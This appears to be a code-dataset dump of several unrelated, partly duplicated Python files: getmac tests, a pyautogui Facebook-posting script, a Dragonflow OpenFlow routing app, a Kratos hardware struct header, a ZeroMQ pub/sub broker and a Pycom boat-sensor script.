@mock_helper('Linux', r'ip neighbor show 192.168.16.2$',
'ubuntu_18.04/ip_neighbor_show_192-168-16-2.out')
def test_linux_ip_neighbor_show_192_168_16_2(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@unittest.skip('No parser for `ip neighbor show`')
@mock_helper('Linux', r'ip neighbor show$', 'ubuntu_18.04/ip_neighbor_show.out')
def test_linux_ip_neighbor_show(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'netstat -iae', 'ubuntu_18.04/netstat_iae.out')
def test_linux_netstat_iae(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
class TestGetMacAddress(unittest.TestCase):
def test_get_mac_address_ip_localhost(self):
result = getmac.get_mac_address(ip='127.0.0.1')
self.assertIsNotNone(result)
class TestFailures(unittest.TestCase):
def test_iface_ip(self):
pass
class TestInternalMethods(unittest.TestCase):
pass
class TestThirdPartyPackages(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main() | 0.697815 | 0.109801 |
import pyautogui
from pyscreeze import ImageNotFoundException
import subprocess
# Improting Image class from PIL module
from PIL import Image
import helper
FACEBOOK_IMAGE_SIZE = 300
MAX_IMAGES_FACEBOOK = 2
SCROLL_LENGTH = 300
PROFILE_LOCATION_X = 200
TOTAL_TEXT_IMAGES = 3
def CheckForImageQuantity(allLocations):
if len(allLocations) > MAX_IMAGES_FACEBOOK:
print("Too many Images")
exit(1)
def LeavePage():
x, y = helper.LocateImage('./facebookImages/back.png')
if x != None and y != None:
helper.LocateAndClick('./facebookImages/back.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/home.png', helper.SMALL_PAUSE)
def LocateAddText():
baseLocation = './facebookImages/text_'
finalLocation = ""
for i in range (1, TOTAL_TEXT_IMAGES + 1):
imageLocation = baseLocation + str(i).zfill(2) + ".png"
x, y = helper.LocateImage(imageLocation)
if x != None and y != None:
finalLocation = imageLocation
break
if finalLocation:
helper.LocateAndClick(finalLocation, helper.MEDIUM_PAUSE)
else:
print("No images match the search")
exit(1)
def GotToPage(username):
helper.LocateAndClick('./facebookImages/menu.png', helper.MEDIUM_PAUSE)
helper.LocateAndClick(username + "_facebook.png", helper.MEDIUM_PAUSE)
def post(inputJSON):
assert "text" in inputJSON
assert "type" in inputJSON
# Open Application
helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.LARGE_PAUSE)
LeavePage()
GotToPage(inputJSON["user"])
# Add Image from Windows
if "images" in inputJSON:
helper.GoToImportPage()
allLocations = inputJSON["images"]
CheckForImageQuantity(allLocations)
helper.AddAllImages(allLocations)
helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.MEDIUM_PAUSE)
helper.Scroll(-100, 2)
helper.PauseForEffect(helper.SMALL_PAUSE)
# Start Post
helper.LocateAndClick('./facebookImages/create.png', helper.MEDIUM_PAUSE)
# Attach Image
if "images" in inputJSON:
helper.LocateAndClick('./facebookImages/addPhoto.png', helper.MEDIUM_PAUSE)
allImages = inputJSON["images"]
for i, image in enumerate(allImages):
helper.LocateAndClick('./facebookImages/gallery.png', helper.MEDIUM_PAUSE, adjY = FACEBOOK_IMAGE_SIZE/2, adjX = (i+1)*FACEBOOK_IMAGE_SIZE)
helper.LocateAndClick('./facebookImages/next.png', helper.MEDIUM_PAUSE)
# Add text (Always at the end, else the links can change a lot of things
LocateAddText()
pyautogui.write(inputJSON["text"], interval = 0.1)
# Tweet It Since its Ready
helper.PauseForEffect(helper.WAIT_WINDOW)
helper.LocateAndClick('./facebookImages/share.png', helper.MEDIUM_PAUSE)
if inputJSON["type"] == "feed":
helper.LocateAndClick('./facebookImages/feed.png', helper.SMALL_PAUSE)
if inputJSON["type"] == "boost":
helper.LocateAndClick('./facebookImages/boost.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/finalShare.png', helper.LARGE_PAUSE)
helper.PauseForEffect(helper.SMALL_PAUSE)
LeavePage()
# Need to delete all the images from the Manager
# Attach Image
if "images" in inputJSON:
# Add Image from Windows
helper.GoToImportPage()
helper.LocateAndClick('./common/cancel.png', helper.SMALL_PAUSE)
CheckForImageQuantity(inputJSON["images"])
helper.DeleteAllImages(inputJSON["images"])
helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE) | climate_reality/facebookPost.py | import pyautogui
from pyscreeze import ImageNotFoundException
import subprocess
# Improting Image class from PIL module
from PIL import Image
import helper
FACEBOOK_IMAGE_SIZE = 300
MAX_IMAGES_FACEBOOK = 2
SCROLL_LENGTH = 300
PROFILE_LOCATION_X = 200
TOTAL_TEXT_IMAGES = 3
def CheckForImageQuantity(allLocations):
if len(allLocations) > MAX_IMAGES_FACEBOOK:
print("Too many Images")
exit(1)
def LeavePage():
x, y = helper.LocateImage('./facebookImages/back.png')
if x != None and y != None:
helper.LocateAndClick('./facebookImages/back.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/home.png', helper.SMALL_PAUSE)
def LocateAddText():
baseLocation = './facebookImages/text_'
finalLocation = ""
for i in range (1, TOTAL_TEXT_IMAGES + 1):
imageLocation = baseLocation + str(i).zfill(2) + ".png"
x, y = helper.LocateImage(imageLocation)
if x != None and y != None:
finalLocation = imageLocation
break
if finalLocation:
helper.LocateAndClick(finalLocation, helper.MEDIUM_PAUSE)
else:
print("No images match the search")
exit(1)
def GotToPage(username):
helper.LocateAndClick('./facebookImages/menu.png', helper.MEDIUM_PAUSE)
helper.LocateAndClick(username + "_facebook.png", helper.MEDIUM_PAUSE)
def post(inputJSON):
assert "text" in inputJSON
assert "type" in inputJSON
# Open Application
helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.LARGE_PAUSE)
LeavePage()
GotToPage(inputJSON["user"])
# Add Image from Windows
if "images" in inputJSON:
helper.GoToImportPage()
allLocations = inputJSON["images"]
CheckForImageQuantity(allLocations)
helper.AddAllImages(allLocations)
helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.MEDIUM_PAUSE)
helper.Scroll(-100, 2)
helper.PauseForEffect(helper.SMALL_PAUSE)
# Start Post
helper.LocateAndClick('./facebookImages/create.png', helper.MEDIUM_PAUSE)
# Attach Image
if "images" in inputJSON:
helper.LocateAndClick('./facebookImages/addPhoto.png', helper.MEDIUM_PAUSE)
allImages = inputJSON["images"]
for i, image in enumerate(allImages):
helper.LocateAndClick('./facebookImages/gallery.png', helper.MEDIUM_PAUSE, adjY = FACEBOOK_IMAGE_SIZE/2, adjX = (i+1)*FACEBOOK_IMAGE_SIZE)
helper.LocateAndClick('./facebookImages/next.png', helper.MEDIUM_PAUSE)
# Add text (Always at the end, else the links can change a lot of things
LocateAddText()
pyautogui.write(inputJSON["text"], interval = 0.1)
# Tweet It Since its Ready
helper.PauseForEffect(helper.WAIT_WINDOW)
helper.LocateAndClick('./facebookImages/share.png', helper.MEDIUM_PAUSE)
if inputJSON["type"] == "feed":
helper.LocateAndClick('./facebookImages/feed.png', helper.SMALL_PAUSE)
if inputJSON["type"] == "boost":
helper.LocateAndClick('./facebookImages/boost.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/finalShare.png', helper.LARGE_PAUSE)
helper.PauseForEffect(helper.SMALL_PAUSE)
LeavePage()
# Need to delete all the images from the Manager
# Attach Image
if "images" in inputJSON:
# Add Image from Windows
helper.GoToImportPage()
helper.LocateAndClick('./common/cancel.png', helper.SMALL_PAUSE)
CheckForImageQuantity(inputJSON["images"])
helper.DeleteAllImages(inputJSON["images"])
helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE) | 0.12416 | 0.20264 |
from neutron_lib import constants as n_const
from os_ken.ofproto import ether
from oslo_log import log
from dragonflow.controller.apps import l3_base
from dragonflow.controller.common import constants as const
from dragonflow.controller import df_base_app
LOG = log.getLogger(__name__)
class L3ProactiveApp(df_base_app.DFlowApp, l3_base.L3AppMixin):
def packet_in_handler(self, event):
"""Handle packets sent to the controller from OVS """
msg = event.msg
self.router_function_packet_in_handler(msg)
def _add_subnet_send_to_route(self, match, local_network_id, router_port):
"""
Add routing flows. i.e. for packets that are routed with this router
(identified by parameter match), from the given network
(local_network_id) and the router interface (router_port), transmit
the packet to the next step in the pipeline. (Update network ID and
L2 header).
:param match: The match object for the packet
:type match: OFPMatch
:param local_network_id: The destination network ID
:type local_network_id: Integer
:param router_port: The router's egress router interface
:type router_port: RouterInterface
"""
self._add_subnet_send_to_proactive_routing(match, local_network_id,
router_port.mac)
def _add_subnet_send_to_proactive_routing(self, match, dst_network_id,
dst_router_port_mac):
"""
Add routing flows. i.e. for packets that are routed with this router
(identified by parameter match), from the given network
(local_network_id) and the router interface (router_port), transmit
the packet to the next step in the pipeline. (Update network ID and
L2 header).
:param match: The match object for the packet
:type match: OFPMatch
:param dst_network_id: The destination network ID
:type dst_network_id: Integer
:param dst_router_port_mac: The router's egress router interface's MAC
:type dst_router_port_mac: IPAddress.EUI (or representation)
"""
parser = self.parser
ofproto = self.ofproto
actions = []
actions.append(parser.OFPActionDecNwTtl())
actions.append(parser.OFPActionSetField(metadata=dst_network_id))
actions.append(parser.OFPActionSetField(eth_src=dst_router_port_mac))
action_inst = parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions)
goto_inst = parser.OFPInstructionGotoTable(
const.L3_PROACTIVE_LOOKUP_TABLE)
inst = [action_inst, goto_inst]
self.mod_flow(
inst=inst,
table_id=const.L3_LOOKUP_TABLE,
priority=const.PRIORITY_MEDIUM,
match=match)
def _add_port(self, lport):
"""Add port which is not a router interface."""
super(L3ProactiveApp, self)._add_port(lport)
dst_mac = lport.mac
network_key = lport.lswitch.unique_key
port_key = lport.unique_key
for dst_ip in lport.ips:
self._add_forward_to_port_flow(dst_ip, dst_mac,
network_key, port_key)
for address_pair in lport.allowed_address_pairs:
self._add_forward_to_port_flow(
address_pair.ip_address,
address_pair.mac_address,
network_key,
port_key,
)
def _add_forward_to_port_flow(self, dst_ip, dst_mac, network_id, port_key,
priority=const.PRIORITY_HIGH):
"""
Add flows to update the packets L2 header and metadata (reg7/output
register) for the given port, and forward the packet.
Match by its IP and network.
:param dst_ip: The IP of the port
:type dst_ip: netaddr.IPAddress (or representation)
:param dst_mac: The MAC of the port
:type dst_mac: netaddr.EUI (or representation)
:param network_id: The unique key of the network
:type network_id: Integer
:param port_key: The unique key of the port
:type port_id: Integer
:param priority: The priority of the flow
:type priority: Integer
"""
parser = self.parser
ofproto = self.ofproto
if dst_ip.version == n_const.IP_VERSION_4:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
metadata=network_id,
ipv4_dst=dst_ip)
else:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
metadata=network_id,
ipv6_dst=dst_ip)
actions = []
actions.append(parser.OFPActionSetField(eth_dst=dst_mac))
actions.append(parser.OFPActionSetField(reg7=port_key))
action_inst = parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions)
goto_inst = parser.OFPInstructionGotoTable(const.EGRESS_TABLE)
inst = [action_inst, goto_inst]
self.mod_flow(
inst=inst,
table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
priority=const.PRIORITY_HIGH,
match=match)
def _remove_port(self, lport):
"""Remove port which is not a router interface."""
super(L3ProactiveApp, self)._remove_port(lport)
network_key = lport.lswitch.unique_key
for dst_ip in lport.ips:
self._remove_forward_to_port_flow(dst_ip, network_key)
for address_pair in lport.allowed_address_pairs:
self._remove_forward_to_port_flow(address_pair.ip_address,
network_key)
def _remove_forward_to_port_flow(self, dst_ip, network_id,
priority=const.PRIORITY_HIGH):
"""
Remove the flows (added in #_add_forward_to_port_flow) which update
the packets L2 header and metadata for a given port and forwards the
packet.
:param dst_ip: The IP of the port
:type dst_ip: netaddr.IPAddress (or representation)
:param network_id: The unique key of the network
:type network_id: Integer
:param priority: The priority of the flow
:type priority: Integer
"""
parser = self.parser
ofproto = self.ofproto
if dst_ip.version == n_const.IP_VERSION_4:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
metadata=network_id,
ipv4_dst=dst_ip)
else:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
metadata=network_id,
ipv6_dst=dst_ip)
self.mod_flow(
table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
command=ofproto.OFPFC_DELETE,
priority=const.PRIORITY_HIGH,
match=match)
def _update_port(self, lport, orig_lport):
"""Update port which is not a router interface."""
if (
set(lport.ips) != set(orig_lport.ips) or
lport.mac != orig_lport.mac or
lport.allowed_address_pairs != orig_lport.allowed_address_pairs
):
self._remove_port(orig_lport)
self._add_port(lport) | dragonflow/controller/apps/l3_proactive.py |
from neutron_lib import constants as n_const
from os_ken.ofproto import ether
from oslo_log import log
from dragonflow.controller.apps import l3_base
from dragonflow.controller.common import constants as const
from dragonflow.controller import df_base_app
LOG = log.getLogger(__name__)
class L3ProactiveApp(df_base_app.DFlowApp, l3_base.L3AppMixin):
def packet_in_handler(self, event):
"""Handle packets sent to the controller from OVS """
msg = event.msg
self.router_function_packet_in_handler(msg)
def _add_subnet_send_to_route(self, match, local_network_id, router_port):
"""
Add routing flows. i.e. for packets that are routed with this router
(identified by parameter match), from the given network
(local_network_id) and the router interface (router_port), transmit
the packet to the next step in the pipeline. (Update network ID and
L2 header).
:param match: The match object for the packet
:type match: OFPMatch
:param local_network_id: The destination network ID
:type local_network_id: Integer
:param router_port: The router's egress router interface
:type router_port: RouterInterface
"""
self._add_subnet_send_to_proactive_routing(match, local_network_id,
router_port.mac)
def _add_subnet_send_to_proactive_routing(self, match, dst_network_id,
dst_router_port_mac):
"""
Add routing flows. i.e. for packets that are routed with this router
(identified by parameter match), from the given network
(local_network_id) and the router interface (router_port), transmit
the packet to the next step in the pipeline. (Update network ID and
L2 header).
:param match: The match object for the packet
:type match: OFPMatch
:param dst_network_id: The destination network ID
:type dst_network_id: Integer
:param dst_router_port_mac: The router's egress router interface's MAC
:type dst_router_port_mac: IPAddress.EUI (or representation)
"""
parser = self.parser
ofproto = self.ofproto
actions = []
actions.append(parser.OFPActionDecNwTtl())
actions.append(parser.OFPActionSetField(metadata=dst_network_id))
actions.append(parser.OFPActionSetField(eth_src=dst_router_port_mac))
action_inst = parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions)
goto_inst = parser.OFPInstructionGotoTable(
const.L3_PROACTIVE_LOOKUP_TABLE)
inst = [action_inst, goto_inst]
self.mod_flow(
inst=inst,
table_id=const.L3_LOOKUP_TABLE,
priority=const.PRIORITY_MEDIUM,
match=match)
def _add_port(self, lport):
"""Add port which is not a router interface."""
super(L3ProactiveApp, self)._add_port(lport)
dst_mac = lport.mac
network_key = lport.lswitch.unique_key
port_key = lport.unique_key
for dst_ip in lport.ips:
self._add_forward_to_port_flow(dst_ip, dst_mac,
network_key, port_key)
for address_pair in lport.allowed_address_pairs:
self._add_forward_to_port_flow(
address_pair.ip_address,
address_pair.mac_address,
network_key,
port_key,
)
def _add_forward_to_port_flow(self, dst_ip, dst_mac, network_id, port_key,
priority=const.PRIORITY_HIGH):
"""
Add flows to update the packets L2 header and metadata (reg7/output
register) for the given port, and forward the packet.
Match by its IP and network.
:param dst_ip: The IP of the port
:type dst_ip: netaddr.IPAddress (or representation)
:param dst_mac: The MAC of the port
:type dst_mac: netaddr.EUI (or representation)
:param network_id: The unique key of the network
:type network_id: Integer
:param port_key: The unique key of the port
:type port_id: Integer
:param priority: The priority of the flow
:type priority: Integer
"""
parser = self.parser
ofproto = self.ofproto
if dst_ip.version == n_const.IP_VERSION_4:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
metadata=network_id,
ipv4_dst=dst_ip)
else:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
metadata=network_id,
ipv6_dst=dst_ip)
actions = []
actions.append(parser.OFPActionSetField(eth_dst=dst_mac))
actions.append(parser.OFPActionSetField(reg7=port_key))
action_inst = parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions)
goto_inst = parser.OFPInstructionGotoTable(const.EGRESS_TABLE)
inst = [action_inst, goto_inst]
self.mod_flow(
inst=inst,
table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
priority=const.PRIORITY_HIGH,
match=match)
def _remove_port(self, lport):
"""Remove port which is not a router interface."""
super(L3ProactiveApp, self)._remove_port(lport)
network_key = lport.lswitch.unique_key
for dst_ip in lport.ips:
self._remove_forward_to_port_flow(dst_ip, network_key)
for address_pair in lport.allowed_address_pairs:
self._remove_forward_to_port_flow(address_pair.ip_address,
network_key)
def _remove_forward_to_port_flow(self, dst_ip, network_id,
priority=const.PRIORITY_HIGH):
"""
Remove the flows (added in #_add_forward_to_port_flow) which update
the packets L2 header and metadata for a given port and forwards the
packet.
:param dst_ip: The IP of the port
:type dst_ip: netaddr.IPAddress (or representation)
:param network_id: The unique key of the network
:type network_id: Integer
:param priority: The priority of the flow
:type priority: Integer
"""
parser = self.parser
ofproto = self.ofproto
if dst_ip.version == n_const.IP_VERSION_4:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
metadata=network_id,
ipv4_dst=dst_ip)
else:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
metadata=network_id,
ipv6_dst=dst_ip)
self.mod_flow(
table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
command=ofproto.OFPFC_DELETE,
priority=const.PRIORITY_HIGH,
match=match)
def _update_port(self, lport, orig_lport):
"""Update port which is not a router interface."""
if (
set(lport.ips) != set(orig_lport.ips) or
lport.mac != orig_lport.mac or
lport.allowed_address_pairs != orig_lport.allowed_address_pairs
):
self._remove_port(orig_lport)
self._add_port(lport) | 0.723407 | 0.206324 |
from kratos import PackedStruct, clog2
from global_buffer.design.global_buffer_parameter import GlobalBufferParams
import math
class GlbHeader():
def __init__(self, _params: GlobalBufferParams):
self._params = _params
self.cfg_data_network_t = PackedStruct("cfg_data_network_t",
[("tile_connected", 1),
("latency", self._params.latency_width)])
self.cfg_pcfg_network_t = PackedStruct("cfg_pcfg_network_t",
[("tile_connected", 1),
("latency", self._params.latency_width)])
self.cfg_dma_ctrl_t = PackedStruct("dma_ctrl_t",
[("mode", 2),
("use_valid", 1),
("data_mux", 2),
("num_repeat", clog2(self._params.queue_depth) + 1)])
# NOTE: Kratos does not support struct of struct now.
dma_header_struct_list = [("start_addr", self._params.glb_addr_width),
("cycle_start_addr", self._params.glb_addr_width)]
dma_header_struct_list += [("dim", 1 + clog2(self._params.loop_level))]
for i in range(self._params.loop_level):
dma_header_struct_list += [(f"range_{i}", self._params.axi_data_width),
(f"stride_{i}", self._params.axi_data_width),
(f"cycle_stride_{i}", self._params.axi_data_width)]
self.cfg_dma_header_t = PackedStruct("dma_header_t", dma_header_struct_list)
# pcfg dma header
self.cfg_pcfg_dma_ctrl_t = PackedStruct("pcfg_dma_ctrl_t", [("mode", 1)])
self.cfg_pcfg_dma_header_t = PackedStruct("pcfg_dma_header_t",
[("start_addr", self._params.glb_addr_width),
("num_cfg", self._params.max_num_cfg_width)])
wr_packet_list = [("wr_en", 1),
("wr_strb", math.ceil(self._params.bank_data_width / 8)),
("wr_addr", self._params.glb_addr_width),
("wr_data", self._params.bank_data_width), ]
rdrq_packet_list = [("rd_en", 1),
("rd_addr", self._params.glb_addr_width), ]
rdrs_packet_list = [("rd_data", self._params.bank_data_width),
("rd_data_valid", 1), ]
self.packet_t = PackedStruct(
"packet_t", wr_packet_list + rdrq_packet_list + rdrs_packet_list)
self.rd_packet_t = PackedStruct(
"rd_packet_t", rdrq_packet_list + rdrs_packet_list)
self.rdrq_packet_t = PackedStruct("rdrq_packet_t", rdrq_packet_list)
self.rdrs_packet_t = PackedStruct("rdrs_packet_t", rdrs_packet_list)
self.wr_packet_t = PackedStruct("wr_packet_t", wr_packet_list)
# NOTE: Kratos currently does not support struct of struct.
# This can become cleaner if it does.
self.wr_packet_ports = [name for (name, _) in wr_packet_list]
self.rdrq_packet_ports = [name for (name, _) in rdrq_packet_list]
self.rdrs_packet_ports = [name for (name, _) in rdrs_packet_list]
self.rd_packet_ports = [name for (name, _) in (
rdrq_packet_list + rdrs_packet_list)]
self.packet_ports = [name for (name, _) in (
rdrq_packet_list + rdrs_packet_list + wr_packet_list)]
self.cgra_cfg_t = PackedStruct("cgra_cfg_t", [("rd_en", 1), ("wr_en", 1), (
"addr", self._params.cgra_cfg_addr_width), ("data", self._params.cgra_cfg_data_width)]) | global_buffer/design/glb_header.py | from kratos import PackedStruct, clog2
from global_buffer.design.global_buffer_parameter import GlobalBufferParams
import math
class GlbHeader():
def __init__(self, _params: GlobalBufferParams):
self._params = _params
self.cfg_data_network_t = PackedStruct("cfg_data_network_t",
[("tile_connected", 1),
("latency", self._params.latency_width)])
self.cfg_pcfg_network_t = PackedStruct("cfg_pcfg_network_t",
[("tile_connected", 1),
("latency", self._params.latency_width)])
self.cfg_dma_ctrl_t = PackedStruct("dma_ctrl_t",
[("mode", 2),
("use_valid", 1),
("data_mux", 2),
("num_repeat", clog2(self._params.queue_depth) + 1)])
# NOTE: Kratos does not support struct of struct now.
dma_header_struct_list = [("start_addr", self._params.glb_addr_width),
("cycle_start_addr", self._params.glb_addr_width)]
dma_header_struct_list += [("dim", 1 + clog2(self._params.loop_level))]
for i in range(self._params.loop_level):
dma_header_struct_list += [(f"range_{i}", self._params.axi_data_width),
(f"stride_{i}", self._params.axi_data_width),
(f"cycle_stride_{i}", self._params.axi_data_width)]
self.cfg_dma_header_t = PackedStruct("dma_header_t", dma_header_struct_list)
# pcfg dma header
self.cfg_pcfg_dma_ctrl_t = PackedStruct("pcfg_dma_ctrl_t", [("mode", 1)])
self.cfg_pcfg_dma_header_t = PackedStruct("pcfg_dma_header_t",
[("start_addr", self._params.glb_addr_width),
("num_cfg", self._params.max_num_cfg_width)])
wr_packet_list = [("wr_en", 1),
("wr_strb", math.ceil(self._params.bank_data_width / 8)),
("wr_addr", self._params.glb_addr_width),
("wr_data", self._params.bank_data_width), ]
rdrq_packet_list = [("rd_en", 1),
("rd_addr", self._params.glb_addr_width), ]
rdrs_packet_list = [("rd_data", self._params.bank_data_width),
("rd_data_valid", 1), ]
self.packet_t = PackedStruct(
"packet_t", wr_packet_list + rdrq_packet_list + rdrs_packet_list)
self.rd_packet_t = PackedStruct(
"rd_packet_t", rdrq_packet_list + rdrs_packet_list)
self.rdrq_packet_t = PackedStruct("rdrq_packet_t", rdrq_packet_list)
self.rdrs_packet_t = PackedStruct("rdrs_packet_t", rdrs_packet_list)
self.wr_packet_t = PackedStruct("wr_packet_t", wr_packet_list)
# NOTE: Kratos currently does not support struct of struct.
# This can become cleaner if it does.
self.wr_packet_ports = [name for (name, _) in wr_packet_list]
self.rdrq_packet_ports = [name for (name, _) in rdrq_packet_list]
self.rdrs_packet_ports = [name for (name, _) in rdrs_packet_list]
self.rd_packet_ports = [name for (name, _) in (
rdrq_packet_list + rdrs_packet_list)]
self.packet_ports = [name for (name, _) in (
rdrq_packet_list + rdrs_packet_list + wr_packet_list)]
self.cgra_cfg_t = PackedStruct("cgra_cfg_t", [("rd_en", 1), ("wr_en", 1), (
"addr", self._params.cgra_cfg_addr_width), ("data", self._params.cgra_cfg_data_width)]) | 0.436262 | 0.242228 |
import logging
import threading
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "<EMAIL>"
class Broker(threading.Thread):
"""docstring for Broker"""
def __init__(self,
xpub="tcp://127.0.0.1:8990",
xsub="tcp://127.0.0.1:8989",
server_key=None,
client_keys=None,
):
self.log = logging.getLogger("{module}.{name}".format(
module=self.__class__.__module__, name=self.__class__.__name__))
super(Broker, self).__init__()
self.running = False
self.xpub_url = xpub
self.xsub_url = xsub
self.ctx = zmq.Context()
self.auth = None
self.server_key = server_key
self.client_keys = client_keys
def run(self):
self.log.debug("Broker starts XPUB:{}, XSUB:{}"
.format(self.xpub_url, self.xsub_url))
self.xpub = self.ctx.socket(zmq.XPUB)
self.xsub = self.ctx.socket(zmq.XSUB)
if self.server_key is not None:
self.auth = ThreadAuthenticator(self.ctx)
self.auth.start()
self.auth.allow('127.0.0.1')
# Tell authenticator to use the certificate in a directory
if self.client_keys is not None:
self.auth.configure_curve(domain='*',
location=self.client_keys)
else:
self.auth.configure_curve(domain='*',
location=zmq.auth.CURVE_ALLOW_ANY)
self.log.debug("Enabling encryption with certificate: {}"
.format(self.server_key))
server_public, server_secret = zmq.auth.load_certificate(
self.server_key)
for sock in [self.xpub, self.xsub]:
sock.curve_secretkey = server_secret
sock.curve_publickey = server_public
sock.curve_server = True # must come before bind
self.xpub.bind(self.xpub_url)
self.xsub.bind(self.xsub_url)
# self.proxy.start()
poller = zmq.Poller()
poller.register(self.xpub, zmq.POLLIN)
poller.register(self.xsub, zmq.POLLIN)
self.running = True
while self.running:
events = dict(poller.poll(1000))
if self.xpub in events:
message = self.xpub.recv_multipart()
self.log.debug("subscription message: {}".format(message[0]))
self.xsub.send_multipart(message)
if self.xsub in events:
message = self.xsub.recv_multipart()
self.log.debug("publishing message: {}".format(message))
self.xpub.send_multipart(message)
for sock in [self.xpub, self.xsub]:
sock.close()
if self.auth:
self.auth.stop()
def stop(self):
self.running = False | uniflex/core/broker.py | import logging
import threading
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "<EMAIL>"
class Broker(threading.Thread):
"""docstring for Broker"""
def __init__(self,
xpub="tcp://127.0.0.1:8990",
xsub="tcp://127.0.0.1:8989",
server_key=None,
client_keys=None,
):
self.log = logging.getLogger("{module}.{name}".format(
module=self.__class__.__module__, name=self.__class__.__name__))
super(Broker, self).__init__()
self.running = False
self.xpub_url = xpub
self.xsub_url = xsub
self.ctx = zmq.Context()
self.auth = None
self.server_key = server_key
self.client_keys = client_keys
def run(self):
self.log.debug("Broker starts XPUB:{}, XSUB:{}"
.format(self.xpub_url, self.xsub_url))
self.xpub = self.ctx.socket(zmq.XPUB)
self.xsub = self.ctx.socket(zmq.XSUB)
if self.server_key is not None:
self.auth = ThreadAuthenticator(self.ctx)
self.auth.start()
self.auth.allow('127.0.0.1')
# Tell authenticator to use the certificate in a directory
if self.client_keys is not None:
self.auth.configure_curve(domain='*',
location=self.client_keys)
else:
self.auth.configure_curve(domain='*',
location=zmq.auth.CURVE_ALLOW_ANY)
self.log.debug("Enabling encryption with certificate: {}"
.format(self.server_key))
server_public, server_secret = zmq.auth.load_certificate(
self.server_key)
for sock in [self.xpub, self.xsub]:
sock.curve_secretkey = server_secret
sock.curve_publickey = server_public
sock.curve_server = True # must come before bind
self.xpub.bind(self.xpub_url)
self.xsub.bind(self.xsub_url)
# self.proxy.start()
poller = zmq.Poller()
poller.register(self.xpub, zmq.POLLIN)
poller.register(self.xsub, zmq.POLLIN)
self.running = True
while self.running:
events = dict(poller.poll(1000))
if self.xpub in events:
message = self.xpub.recv_multipart()
self.log.debug("subscription message: {}".format(message[0]))
self.xsub.send_multipart(message)
if self.xsub in events:
message = self.xsub.recv_multipart()
self.log.debug("publishing message: {}".format(message))
self.xpub.send_multipart(message)
for sock in [self.xpub, self.xsub]:
sock.close()
if self.auth:
self.auth.stop()
def stop(self):
self.running = False | 0.434941 | 0.055797 |
import pycom
import lteHelper
import machine
from machine import I2C
import pytrackHelper
from pytrack import Pytrack
from LIS2HH12 import LIS2HH12
import time
import gc
import sys
import bme280
from ADS1115 import ADS1115
# ***********************************************************
# ourBoatMonitor IOT code for the boat sensor and LTE transmiter
# ***********************************************************
pycom.heartbeat(False)
# Flags to switch on sensors to collect
includeGPS = True
includeBME280 = True
includeADS1115 = True
# Flag to send data via LTE
sendData = True
# Seconds to spend in low power sleep
DEEP_SLEEP_SECONDS = 3600
# Voltage divider adjustment for ADC0
# Send the true voltage to the backend
adc0VRatio = 0.0909
# flag to go into sleep loop (Turn off for testing)
doSleep = True
try:
py = Pytrack()
acc = LIS2HH12()
print("")
# Set deep sleep parameters
py.setup_int_wake_up(True, False)
# Turn off accelerometer
acc.set_odr(0)
gc.collect()
# ******************************************************************
# Collect sensor data, append to the dataList array to be sent via LTE
# ******************************************************************
dataList = []
# Get the Lithium Ion (Li-ion) battery voltage
LIVoltage = py.read_battery_voltage()
dataList.append(("LIVoltage", LIVoltage))
print("LIVoltage", LIVoltage)
# Include GPS reading
if includeGPS:
print("Getting GPS...")
# Get GPS data from pytrack board
gps = pytrackHelper.getGPS(py, 300)
if (gps[0] is not None and gps[1] is not None):
# Create a list of key value pairs to be
# sent by LTE to hologram
dataList.append(("lat", gps[0]))
dataList.append(("lng", gps[1]))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
# Use i2c bus 1 for additional i2c devices (Otherwise using Bus 0 messes up the deep sleep processing)
i2c = I2C(1, I2C.MASTER, pins=('P10', 'P9'), baudrate=100000)
# Include the BME280 sensor for Temperature, Presure and humidity readings
if includeBME280:
print("BME280")
bme = bme280.BME280(i2c=i2c)
t, p, h = bme.values
dataList.append(("Pressure", p))
dataList.append(("Temperature", t))
dataList.append(("Humidity", h))
else:
dataList.append(("Pressure", 0))
dataList.append(("Temperature", 0))
dataList.append(("Humidity", 0))
